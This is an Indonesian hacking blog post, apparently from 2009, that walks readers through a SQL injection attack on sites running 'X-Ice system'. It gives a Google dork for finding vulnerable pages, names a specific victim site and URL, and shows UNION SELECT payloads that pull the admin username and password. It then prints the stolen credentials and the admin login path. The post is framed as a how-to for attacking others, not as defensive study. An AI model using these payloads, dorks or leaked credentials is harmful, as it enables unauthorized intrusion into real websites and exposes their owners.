Tuesday, 10.17.2017, 0:55 AM
N30-G4BR13L
Main | Publisher | Registration | Login
Site menu
Section categories
Trick Blog [9]
All About Computer and Network [3]
Hacking [22]
Do you know? [3]
Zona Religi [5]
Belajar Pemrograman [0]
My Diary [1]
My Playlist

My YM Pinbox

Powered by:
Statistics

Total online: 1
Guests: 1
Users: 0
Main » Articles » Hacking

Bug di X-Ice system
Bug di X-Ice system, sampai saat ini masih banyak vulnerability dari situs-situs yang masih bisa dimanfaatkan

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat … biasa qt cari lewat mbah google ^_^

Dork:inurl:/devami.asp?id=
geri

korban yang saya dapatkan sekarang (6 juni'09 12.47 Am)

http://www.yemliha.org/koy/hbr/devami.asp?id=124

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 124-nya.

jadi:
http://www.yemliha.org/koy/hbr/devami.asp?id=

Yang anda dapatkan adalah kurang lebih error yang seperti ini
--------------------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id='.

/koy/hbr/devami.asp, line 8
--------------------------------------------------------------------------------------------
haha.....terdapat Error!! karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 70 dengan

-124+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin


exp:http://www.yemliha.org/koy/hbr/devami.asp?id=-124+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

jreng..jreng..
pada kiri atas qt dapat Username nya...
(imparator)

Hore....(senang ala newbie)

:lol:

Sekarang qt masukan sql injection untuk mencari passwordnya!! :p

+union+select+0,sifre,2,3,4,5,6,7+from+admin

exp:
http://www.yemliha.org/koy/hbr/devami.asp?id=-124+union+select+0,sifre,2,3,4,5,6,7+from+admin

haha..ternyata passwordnya!!!!
( 183206)
:lol:
Untuk login sebagai admin anda tinggal balik kehalaman admin atau cari halaman admin, kebetulan pas saya cari admin apetnya kontrol.asp
m^_^m

exp:
http://www.yemliha.org/koy/kontrol.asp

dan masukan hasilnya hehe..

"selamat mencoba"<<<---kaya hidangan malem aza.ckikikik
source: vir0e5
Category: Hacking | Added by: neo-gabriel (08.09.2009)
Views: 155 | Rating: 0.0/0 |
Total comments: 0
Name *:
Email *:
Code *:
Search
Login form
My YM Status

Flag Counter
free counters
Silakan Berteriak!!
Link Back ya,
http://neo-gabriel.tk
My Friends

Copyright Neo-Gabriel © 2017